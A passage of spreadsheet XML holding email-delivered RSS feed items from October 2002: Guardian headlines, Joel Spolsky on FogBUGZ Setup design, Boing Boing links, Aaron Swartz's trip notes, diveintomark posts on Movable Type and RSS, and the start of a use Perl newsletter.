    <t>URL: [URL]http://www.newsisfree.com[/URL],8688977,215/\nDate: 2002-10-09T03:15:13+01:00\n\n*Media:* Move could lead to Rupert Murdoch's News Corporation being outvoted on \nmajor board decisions.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:55 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:55 -0000</t>
  </si>
  <si>
    <t>Davis stirs grassroots with right to buy promise</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8688975,215/\nDate: 2002-10-09T03:15:16+01:00\n\n*Tory conference:* Thatcherites cheer former chairman's housing plans.</t>
  </si>
  <si>
    <t>Bournemouth blues</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8666353,215/\nDate: 2002-10-08T12:47:59+01:00\n\n*Cartoon: Steve Bell *on the Conservative party conference.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:54 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:54 -0000</t>
  </si>
  <si>
    <t>Blair challenge to IRA</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8688970,215/\nDate: 2002-10-09T03:15:21+01:00\n\nPM calls for major arms deal to save Stormont.</t>
  </si>
  <si>
    <t>Tate unveils its biggest work</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8688972,215/\nDate: 2002-10-09T03:15:19+01:00\n\nAt 155 metres, Anish Kapoor's sculpture is one of the world's largest.</t>
  </si>
  <si>
    <t>Paddick backers angry at Met move</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8688973,215/\nDate: 2002-10-09T03:15:18+01:00\n\n*UK latest:* Met blocks Brian Paddick returning to his job as commander of \nLambeth by appointing him to another post.</t>
  </si>
  <si>
    <t>Plans for new youth units blocked</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8689493,215/\nDate: 2002-10-09T03:46:02+01:00\n\nBrown blocks plans for new secure training centres for teenage offenders.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:39 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:39 -0000</t>
  </si>
  <si>
    <t>joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Feedback from my posting about FogBUGZ Setup fell into four</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\nFeedback from my posting[1] about FogBUGZ[2] Setup fell into four categories. \n\n*"Why make Setup reversable? Instead you should collect all the information \nfrom the user and make all the changes in one batch at the end."* There are a \ncouple of things to understand here. First of all, even if you do everything in \none batch at the end, there's always a possibility that some step in the middle \nof the batch will fail, and in that case, a well-behaved setup program will \nback out the steps that were already done. There are well over 100 error \nmessages in the string table for FogBUGZ Setup so the number of things that can \nfail is not insignificant. \n\nSecond, it's not nice to tell people about an error in their input three pages \nafter they made the mistake. For example, early in the FogBUGZ setup process we \nprompt you to create an account for FogBUGZ to use: \n\n[IMG: [URL]http://www.joelonsoftware.com[/URL] (FogBUGZ Setup \nScreenshot)] \n\nThe account creation could fail for a myriad of reasons, none of which can be \npredicted before trying to create the account. For example, the password might \nnot conform to the system password policy. And different national versions of \nWindows NT have different rules about accented letters in passwords (betcha \ndidn't know that!). It's better to tell the user about this problem right away \nso they can correct their input rather than having a message come up during the \nlong install process later, forcing the user to back up and fix it. And even if \nyou force the user to back up and fix it, you still have to undo the first part \nof the work that you did before creating the account, otherwise you've left \ntheir system in an indeterminate state. \n\nIn any case I need to write code to create the account and delete the account \nin case something later fails; I might as well call that code on this page of \nthe wizard where I can display a useful error message. \n\nAnd what are the kinds of things that need to be reversable? Well, in order to \nupgrade FogBUGZ without requiring a reboot (and we _never, ever _require a \nreboot), we have to shut down a couple of processes that might have been \nkeeping FogBUGZ files pinned down, such as IIS (Microsoft's web server). So \npart one of the batch is "Stop IIS." Now if part 2 fails for some reason, it \nwould be _extremely_ rude to leave IIS not running. And anyway, it's not like I \ndon't need to write the code for "Start IIS" for the end of the batch. So the \ncode to rollback "Stop IIS" is already written. No big deal, I just need to \ncall it at the right place. \n\nI think one reason that people think you should "gather all the info and then \ndo all the work" is because with very large installation programs that are very \nslow, this is a polite way to waste less of the user's time. Indeed even \nFogBUGZ setup does 95% of its work at the very end. But the "create account" \noperation is so fast, that principle simply doesn't apply here. Even our 95% of \nthe work phase takes well under a minute, most of which is spent waiting for \nIIS to stop and start. \n\n*"Why did you use VC++/MFC? Surely an advanced intelligence such as yourself \nhas admitted by now that Delphi[3] is more productive."* First of all, leave \nyour language religious fanaticism at the Usenet door. Somehow I managed \nto figure out_ in high school_ that language advocacy and religious \narguments are unbelievably boring.  \n\nSecondly, even if Delphi were more productive, the only pertinent question, \nsince I am writing the code, is _what is more productive for Joel Spolsky_. And \nI don't know Delphi at all, but I know Win32, MFC, and VC++ _really, really \nwell_. So while I might not outcode a good Delphi programmer, I would \ndefinitely outcode a completely inexperienced Delphi programmer (which is me), \ncertainly over a short 4 week project. Third, many of the things I needed to do \nin this setup program are things like "grant the Logon as Service privilege to \nan account." This is rare enough that the only way to find out how to do this \nis to search the Microsoft knowlege base and the web in general. When you \nsearch the web in general for how to do fancy things with Windows NT, what you \nfind is about 75% C code, maybe 20% VB code, and 5% everything else. Yes, I \nknow, I could translate the C code into Delphi (assuming I was a sophisticated \nDelphi programmer, not a completely inexperienced Delphi programmer), but that \ncosts as much productivity as I would supposedly gain from your supposedly more \nproductive programming language. And fourth, I already had about 30% of the \ncode I needed for Setup in MFC format: from FogBUGZ 2.0 Setup, and a library \nI've been using for years to make wizards. \n\n*"Why make Setup at all? You already have your customers' money. Good Setup \nprograms don't increase sales."* This was actually the smartest question and \nmade me think the hardest. I came up with three reasons: \n\n- Decreased tech support cost. This setup program will pay for itself over the \nlife of the code. \n- Delight my customers. When I'm trying to get them to upgrade to 4.0, I want \nthem to remember how painless the 3.0 installation was, so they won't hesitate \nbecause they are afraid to upgrade. I'm still using an old version of \nSpamAssassin that is becoming increasingly ineffective, even though I know the \nnew version is much better, because I just can't bear the thought of another \nmorning wasted. The very memory of the first SpamAssassin installation -- all \nthe little SSH windows, some su'ed, trying to scroll through man pages and \nGoogle Groups, accidentally hitting Ctrl+Z in Emacs to undo and having it \nsuspend, trying to guess why we can't get the MTA to run procmail, sorry it's \ntoo much. If SpamAssassin was making money off of upgraders they would have \nlost my business because they don't have a SETUP program. \n- Win reviews. Software reviewers always cast about for some kind of \nstandardized way to rate software, even when they are comparing apples and \noranges and planets and 17th century philosophers. They always have a \nmeaningless list of things to review which can be applied to PC games, \nmainframe databases, web site auction software, and DNA sequencing \nsoftware. And Setup is always on their list. A single flaw in setup is \nguaranteed to be mentioned in every review because every reviewer will see it \nand say "Aha!"\n\n\n*"How can we make WISE[4] better?" *Kudos to the product manager of WISE \nInstallation System for calling me up and listening to my litany of all the \nreasons his product wasn't adequate for typical IIS/ASP/SQL applications.\n\n[1] [URL]http://www.joelonsoftware.com[/URL]\n[2] [URL]http://www.fogcreek.com[/URL]\n[3] [URL]http://discuss.fogcreek.com[/URL]\n[4] [URL]http://www.wise.com[/URL]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://www.joelonsoftware.com http://www.joelonsoftware.com http://www.fogcreek.com http://discuss.fogcreek.com http://www.wise.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:36 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:36 -0000</t>
  </si>
  <si>
    <t>MC Escher in Lego</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\n[IMG: [URL]http://www.craphound.com[/URL]] Lego enthusiasts have \nimplemented three of Escher's optical illusion paintings (including "Ascending \nand Descending," pictured here), using Lego! Link[1] Discuss[2] (_via MeFi[3]_) \n\n\n\n[1] [URL]http://www.lipsons.pwp.blueyonder.co.uk[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.metafilter.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.craphound.com http://www.lipsons.pwp.blueyonder.co.uk http://www.quicktopic.com http://www.metafilter.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:35 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:35 -0000</t>
  </si>
  <si>
    <t>Skinny Acoustic Bass</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\n[IMG: [URL]http://www.konaweb.com[/URL]] I often carry my ukulele with me \non planes. The case is so little it can fit in my suit case. I missed a great \nphoto opportunity when I was in the airport a couple of weeks ago, and saw \nsomeone checking on a standup bass fiddle. It was in a huge plastic Darth Vader \nshipping case. The _buckles_ on the thing were about the size of my uke. I \nshould have taken a picture of my uke and the bass side-by-side. Anyway, here's \na stand-up bass that looks much more portable: the Kona Walkingstick. You still \nneed to carry around an amp, though. Link[1] Discuss[2] _(Thanks, Prentiss[3]!)\n_\n\n\n[1] [URL]http://www.konaweb.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://boingboing.net[/URL];[URL]http://www.io.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.konaweb.com http://www.konaweb.com http://www.quicktopic.com http://boingboing.net http://www.io.com</t>
  </si>
  <si>
    <t>Excellent Tim Biskup card deck</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\n[IMG: [URL]http://boingboing.net[/URL]]Tim Biskup is an artist who \ndoes a lot of work for animation studios. His work is inspired by one of my \nfavorite illustrators, Jim Flora. Tim's selling a deck of poker cards, each \nwith a different illo, and they look terrific. Lots of whimsical monsters and \nhappy monkeys and weird prehistoric plants. I pre-ordered my deck just now. \nHurry, only 2500 decks will be printed! Link[1] Discuss[2]\n\n\n[1] [URL]http://www.timbiskup.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://boingboing.net http://www.timbiskup.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:34 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:34 -0000</t>
  </si>
  <si>
    <t>Ink is speech</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nKen "Oral Fixation" Starr has a new cause: fighting in the Supreme Court for \nthe First Amendment rights of Soth Carolinans to get and give tattoos. Link[1] \nDiscuss[2] (_Thanks, Jeremy!_)\n\n[1] [URL]http://story.news.yahoo.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://story.news.yahoo.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Live forever or die trying</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nNew Scientist is throwing a scavenger hunt with two prizes: "Live forever" and \nget a gift certificate good for cryonic freezing or "Live now" and take a \nluxury trip to Hawai'i. Link[1] Discuss[2] (_Thanks, Jens[3]!_)\n\n[1] [URL]http://www.newscientist.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.nosenseofplace.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.newscientist.com http://www.quicktopic.com http://www.nosenseofplace.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:33 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:33 -0000</t>
  </si>
  <si>
    <t>Palm-sized translators going to Iraq</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe US Military is planning on equipping Gulf troops with two-way translators: \nPalm-sized devices with speech-recognition and automated translation. Tried \nspeech-to-text lately? How about Babelfish? Boy, is this technology ever gonna \nsuck: "Take he to that chemistry arm vegetable." Link[1] Discuss[2] (_Thanks, \nNat[3]!_)\n\n[1] [URL]http://www.cnn.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.frii.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.cnn.com http://www.quicktopic.com http://www.frii.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:32 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:32 -0000</t>
  </si>
  <si>
    <t>Japa-crappers get high-tech</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nJapanese toilet technology has developed creeping featuritis. New Tokyo toities \nsport speech-recognition, air-conditioning, and body-chemistry monitors: \n\n    Japan's toilet wars started in February, when Matsushita engineers here \n    unveiled a toilet seat equipped with electrodes that send a mild electric \n    charge through the user's buttocks, yielding a digital measurement of \n    body-fat ratio. \n\n    Unimpressed, engineers from a rival company, Inax, counterattacked in April \n    with a toilet that glows in the dark and whirs up its lid after an infrared \n    sensor detects a human being. When in use, the toilet plays any of six \n    soundtracks, including chirping birds, rushing water, tinkling wind chimes, \n    or the strumming of a traditional Japanese harp.  \n\nLink[1] Discuss[2] (_Thanks, May[3]!_)\n\n[1] [URL]http://www.nytimes.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.filterfine.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.nytimes.com http://www.quicktopic.com http://www.filterfine.com</t>
  </si>
  <si>
    <t>Lego harpsichord: A for Obsessiveness, F for Tunefulness</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nYet another Lego obsessive has built a working Lego harpsichord. Tons of points \nfor style, but damn, it sounds like hell. Link[1] Discuss[2] (_Thanks, Tim[3]!_\n)\n\n[1] [URL]http://www.henrylim.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.sff.net[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.henrylim.org http://www.quicktopic.com http://www.sff.net</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:31 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:31 -0000</t>
  </si>
  <si>
    <t>Working for the Mouse</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nBerkeley's Impact Theatre is running a one-man show called "Working for the \nMouse," which details one man's experiences working at Disneyland. The story of \nthe show's poster[1] is pretty funny, too. Link[2] Discuss[3] (_Thanks, Barry!_\n)\n\n[1] [URL]http://www.cheshiredave.com[/URL]\n[2] [URL]http://www.impacttheatre.com[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.cheshiredave.com http://www.impacttheatre.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>$15,000 umbrella stand: nothing exceeds like excess</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nTeresa's written a wonderful blog post about the revelation that Tyco's crooked \nCEO spent "6,000 on a shower curtain, $15,000 for an umbrella stand, $2,900 on \ncoat hangers, $5,960 on bedsheets and $2,200 for a wastebasket." \n\n    Naturally, they assured her that not only is it possible to pay $6,000 for \n    your shower curtains and $2,200 for a wastebasket, it's a Good Thing to do \n    so, practically essential. Then they explain how: \n\n    "Sometimes the wastebasket is exposed," said Joel Joves, a designer with \n    offices in Rancho Santa Fe and Beverly Hills. "If you have a fabulous study \n    or master bedroom, then maybe we need a pewter-finished basket with \n    decorative pearl beadings or semiprecious stones to complete the look of a \n    room." \n\n    That's Fool Money at work. If you can't find a sufficiently fabulous \n    wastebasket for $200, $500 absolute tops, you're not half trying.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://nielsenhayden.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://nielsenhayden.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:18 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:18 -0000</t>
  </si>
  <si>
    <t>Trip Notes</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-10-08T16:39:48-06:00\n\n=== Scissors === \n\nI, like most other people here, went through the security checkpoint. Unlike \neveryone else, they decided to search my suitcase. The security lady asked for \npermission and then took everything out: clothing, umbrellas, a jacket, and a \nbox of crackers. She searched all the pockets: nothing. Apparently the jacket \nwas suspicious; She sent it through again. Nothing. \n\n    The lady in the next lane waved a 10-inch knife and asked the lady in my \n    lane if it could go on. I can only assume she answered yes. \n\nShe put everything back in and sent it through again. Still suspicious. They \ntook everything out. It looked like this was going to take a while, so I used \nthe opportunity to put the tickets I was holding back in my bag. When I looked \nback up, the security woman was brandishing a scissors and saying "This can't \ngo on board." "I don't remember packing that," I said. I let her confiscate it. \n\nI called my Mom. She doesn't remember packing it either. Is there some sort of \nterrorist plot to plant scissors in innocent-looking people's suitcases? I \ncan't see why this would be useful. How would they know what plane I'm on? Once \nI'm on the plane how would they get the scissors? They could threaten me, but \nif they have a threatening implement already, then why do they need the \nscissors? Perhaps it's some sort of Matroishca-doll system. They use their \nfists to get the infant to give them the squeaky mouse, they use the squeaky \nmouse to scare the toddler into giving them a copy of _A New Kind of Science_, \nthey use ANKS to bludgeon a 5th Grader into giving them a wedge block, and they \nuse the wedge to get me to give them the scissors. Those are some pretty clever \nterrorists. \n\n*Update:* False alarm. My Mom called. Apparently it was the scissors she was \nusing to cut loose threads from my tie last night. It must have fallen in. The \nnation can go back to Yellow Level Terrorist Alert.  \n\n=== Waiting for Wireless === \n\nNow I am at O'Hare Airport, sitting outside the Admiral's Club while \nbusinessmen walk in and out. I am looking for a wireless signal, the signal I \nused last time I was here, but not finding it. Of course, last time I was here, \nI had an Admiral's Club card. This time I have a Mileage Plus Card, but despite \nthe airline ologopoly--or perhaps because of it (have to keep up appearances, \nyou know)--I doubt they will accept it. \n\n=== Irony === \n\nAccording to the announcement I just heard, Mr. Valenti is going to miss his \nflight. \n\nI think of what I'd say if I ran into him. "Jack!" I'd exclaim, as if we were \nold pals. "Going to the Eldred case?" Of course he was. "Going to be a good \none." "Hey, remember when you had that debate with Lessig?" I'd ask. "You said \nyou were starting a new task force to make movies legitimately available on the \nInternet. What ever happened to that?" I imagine him mumbling and looking down \nat his watch. His plane is going to leave soon; he has to run. \n\nAnother announcement: Mr. Michael McKenna needs to call his office. Good thing \nthese airline announcements keep me up to date. \n\n=== Automatic Flush Toilets === \n\nNow I am short and the sensing system was mounted up tall in both instances. In \nthe first, at my old high school (where you think some people might be a little \nshort...), the flush went off once accidentally. OK, I thought, I can handle \none mistake. Then it went off again. Here at the airport, it misfired three \ntimes. \n\nThis is annoying and inexcusable. Have they not heard of user testing? Do they \nexpect only tall people to use these bathrooms? This problem must be remedied \nimmediately. I recommend releasing a Service Pack on the manufacturer's web \nsite. \n\n=== Arrival === \n\nI've arrived in D.C.--once again, I'm sitting a block away from my hotel on the \nsidewalk borrowing someone's connection. Trip was very smooth, had lunch with \nLisa and went to the Spy Museum (pretty cool, but could have been better). Now \nfor the meetings and parties. \n\nSorry for not responding to your email. I'm rather busy. ;-)</t>
  </si>
  <si>
    <t>http://www.aaronsw.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:15 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:15 -0000</t>
  </si>
  <si>
    <t>Barney Not Found</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-08T22:41:03-05:00\n\nMicrosoft Knowledge Base Article Q172668: Barney Fun on Imagination Island \nError Message: Barney Not Found[1]. Microsoft ActiMates Interactive Barney may \nconflict with a wide range of radio-operated electronic devices, including \nburglar alarms, resulting in the dreaded &amp;#8220;Barney Not Found&amp;#8221; error. \nTo resolve this problem, Microsoft recommends turning off your burglar alarm. \n\nIncidentally, this is the funniest MS KBase article I've seen since Earth \nRotates in Wrong Direction[2].\n\n\n\n[1] [URL]http://support.microsoft.com[/URL];EN-US;Q172668&amp;\n[2] [URL]http://support.microsoft.com[/URL];EN-US;Q131109&amp;</t>
  </si>
  <si>
    <t>http://diveintomark.org http://support.microsoft.com http://support.microsoft.com</t>
  </si>
  <si>
    <t>Movable Type 2.5 is out</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-08T20:52:08-05:00\n\nMovable Type 2.5 is out. I'm running it and it appears to work. It incorporates \nmany suggestions from Dive Into Accessibility[1], a book which was written in \nand is still powered by Movable Type. I find this amusing in a self-referential \nsort of way. \n\nThe other big change is the inclusion of MT-search to allow users to have their \nown site search. Every web site needs a site search[2]. Existing MT-search \nusers should merge the contents of mt-search.cfg into mt.cfg, change \n"TemplateDir" to "SearchTemplatePath", and (if you use alternate templates) \nchange "AltTemplate1", "AltTemplate2", "AltTemplate3", etc. to "AltTemplate". \nThey should all just be "AltTemplate". \n\n- Download MT 2.5[3]. \n- MT 2.5 changelog[4]. \n\n\n\n\n\n[1] [URL]http://diveintoaccessibility.org[/URL]\n[2] [URL]http://diveintoaccessibility.org[/URL]\n[3] [URL]http://www.movabletype.org[/URL]\n[4] [URL]http://www.movabletype.org[/URL] (2002.10.08)</t>
  </si>
  <si>
    <t>http://diveintomark.org http://diveintoaccessibility.org http://diveintoaccessibility.org http://www.movabletype.org http://www.movabletype.org</t>
  </si>
  <si>
    <t>In praise of evolvable formats</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-08T12:28:10-05:00\n\n_Clay Shirky_: In Praise of Evolvable Systems[1]. This entire article could be \nrewritten to explain RSS. In fact, let's do that. \n\nIf it were April Fool's Day, the Net's only official holiday, and you wanted to \ndesign a &amp;#8220;novelty format&amp;#8221; to slip by the W3C as a joke, it might \nlook something like RSS 0.9x/2.0: \n\n- It would specify limits on data values, then remove them, then specify \nrequired elements, then make them optional, thus silently breaking an unknown \nnumber of parsers around the world. \n- It would encourage use of entity-encoded HTML in its most important element, \nthus ensuring both security risks and unpredictable display for the end user. \n- It would ignore years of standards work in other fields, committing such \negregious sins as defining a guid element that wasn't a GUID, and using an \nobsolete date format that couldn't easily be sorted by date. \n- Its primary method of extensibility would be to add new elements to the core \nnamespace without telling anyone or documenting them, thus making it wholely \nresistant to DTD, schema, or validation of any kind. \n- After years of worldwide deployment, it would completely reverse its \nadd-whatever-you-want extensibility rules in favor of namespaces, which the \nspec would neither define nor elaborate on. \n- After adopting namespaces, it would fail to deprecate any existing elements \nsemantically identical to namespace elements already in wide use. It would also \nfail to provide precedence rules in cases where a document attempted to say the \nsame thing in two different ways, thus ensuring mass confusion among producers \nand inconsistent behavior across consumers. \n\nRSS 0.9x and 2.0 are the Whoopee Cushion and Joy Buzzer of syndication formats. \nFor anyone who has tried to accomplish anything serious with metadata, it's \npretty obvious that of the various implementations of a worldwide syndication \nformat, we have the worst one possible. \n\nExcept, of course, for all the others. \n\nThe problem with that list of RSS deficiencies is that it is also a list of \nnecessities&amp;#8212;RSS has flourished in a way that no other syndication format \nhas, not despite many of these qualities but because of them. The very \nweaknesses that make RSS so infuriating to serious practitioners also make it \npossible in the first place. \n\n- Removing length limitations on description and making title optional opened \nup RSS to a whole new category of producer: the weblogger. \n- Allowing encoded HTML in description let publishers reuse both their existing \ncontent and the existing RSS infrastructure, without requiring them to produce \nvalid XHTML (which could be embedded directly into an XML document). Social \nmores, rather than technical rules, prevent producers from intentionally \nintroducing security risks through malicious script tags or unpredictable \ndisplay through unclosed HTML elements. \n- Few publishing tools can produce real conforming GUIDs, and it doesn't \nmatter, because virtually all RSS parsers are written in high level languages \nwhere handling strings is more efficient than converting strings to bytecodes \nand handling bytecodes. As for dates, by convention an RSS document is laid out \nin reverse chronological order, and no one seems to be clamoring for more \nflexibility. \n\nFurthermore, its almost babyish XML syntax, so far from any serious \ncomputational framework (Where are the namespaces? Where is the Document Type \nDescription? Why is the aggregators' enforcement of conformity so lax?), made \nit possible for anyone wanting an RSS feed to write one. The effects of this \nease of implementation only become clear when you compare it to the attempts \nover the years to &amp;#8220;do RSS right&amp;#8221;&amp;#8212;most notably RSS 1.0 in the \nyear 2000. RSS 1.0 had three main benefits: \n\n- Backward compatible with RSS 0.90, which was never widely deployed, and which \nfell into obscurity as soon as (the much simpler) RSS 0.91 was introduced. \n- Based on RDF (specifically a serialization called RDF/XML), a spec which, at \nthe time and to this day, continues to change or threaten to change. Two years \nlater, there are no major languages or development platforms that ship with \nparsers to consume RDF, although many (Perl, Python, .NET) have third-party RDF \nparsers in various states of development and conformance. (The release version \nis generally out of date; CVS access is recommended. You get the idea.) \nMeanwhile, RDF/XML production tools are so inconsistent that even RDF experts \nrecommend not using RDF tools to produce an RSS 1.0 feed if you want it to \nactually be read by any major RSS aggregator. Despite the two-year-old promise \nof better tools[2], it is now the year 2002, and I built my RSS 1.0 \nfeed&amp;#8212;in the most sophisticated personal publishing system in the \nworld&amp;#8212;by manually typing a mishmash of template tags and angle brackets \ninto a TEXTAREA of an HTML form. \n- Extensible through namespaces, which, as mentioned above, have been \nhaphazardly and poorly incorporated into RSS 2.0, where they appear to be \nflourishing. \n\nEvolvable formats&amp;#8212;those that proceed by being adapted and extended in a \nthousand small ways&amp;#8212;have three main characteristics that are germane to \ntheir eventual victories over strong, centrally designed formats. \n\n- Only solutions that produce partial results with imperfect tools can succeed. \nMy RSS feed is an XML document produced by a template that I built in a \nTEXTAREA, and consumed by hundreds of parsers around the world that know \nnothing of XML and hack apart my feed with regular expressions. The world is \nlittered with formats that would have worked if only everyone had better tools. \nIf everyone in the world had a perfect RDF parser at their disposal, it would \nbe trivial to produce and consume all the world's metadata in RDF. Without such \nperfect tools, both production and consumption instantly become nightmares. \nThere is no middle ground. \n- What is, is wrong. Because evolvable formats have always been adapted to \nearlier conditions and are always being further adapted to present conditions, \nthey are always behind the times. RSS was being stretched with long \ndescriptions, optional titles, and entity-encoded HTML even before such \npractices were codified in the spec, and long before all consumers could handle \nthem. No evolving format is ever perfectly in sync with the challenges it \nfaces. \n- Finally, Orgel's Rule, named for the evolutionary biologist Leslie \nOrgel&amp;#8212;&amp;#8220;Evolution is cleverer than you are&amp;#8221;. As with the list \nof RSS's obvious deficiencies above, it is easy to point out what is wrong with \nany evolvable system at any point in its life. No one seeing RSS 1.0 and RSS \n0.91 side-by-side could doubt that RSS 1.0 had the superior technology, that it \n&amp;#8220;did things right&amp;#8221;. However, the ability to understand what is \nmissing at any given moment does not mean that one person or a small central \ngroup can design a better system in the long haul. \n\nDesigned formats start out strong and improve logarithmically. Evolvable \nformats start out weak and improve exponentially. RSS 2.0 is not the perfect \nsyndication format, just the best one that's also currently practical. \nInfrastructure built on evolvable formats will always be partially incomplete, \npartially wrong and ultimately better designed than its competition.\n\n\n\n[1] [URL]http://www.shirky.com[/URL]\n[2] [URL]http://groups.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.shirky.com http://groups.yahoo.com</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 09 Oct 2002 02:00:35 +0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 02:00:35 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-10-09</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Passing the Parrot Pumpkin\n    * The Perl Journal On The Ropes\n\n+--------------------------------------------------------------------+\n| Passing the Parrot Pumpkin                                         |\n|   posted by KM on Tuesday October 08, @09:11 (parrot)              |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]Dan writes "After a good run, Jeff Goff, the current Parrot release\nmanager and Keeper of the Keys and Source, is passing on the hat. Let's\neveryone give a big welcome to Steve Fink, who's agreed to take up the\nposition." Thanks for the work Jeff... now Steve, get the whip cracking!\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://yetanother.org[/URL]\n\n\n+--------------------------------------------------------------------+\n| The Perl Journal On The Ropes                                      |\n|   posted by pudge on Tuesday October 08, @14:35 (links)            |\n|   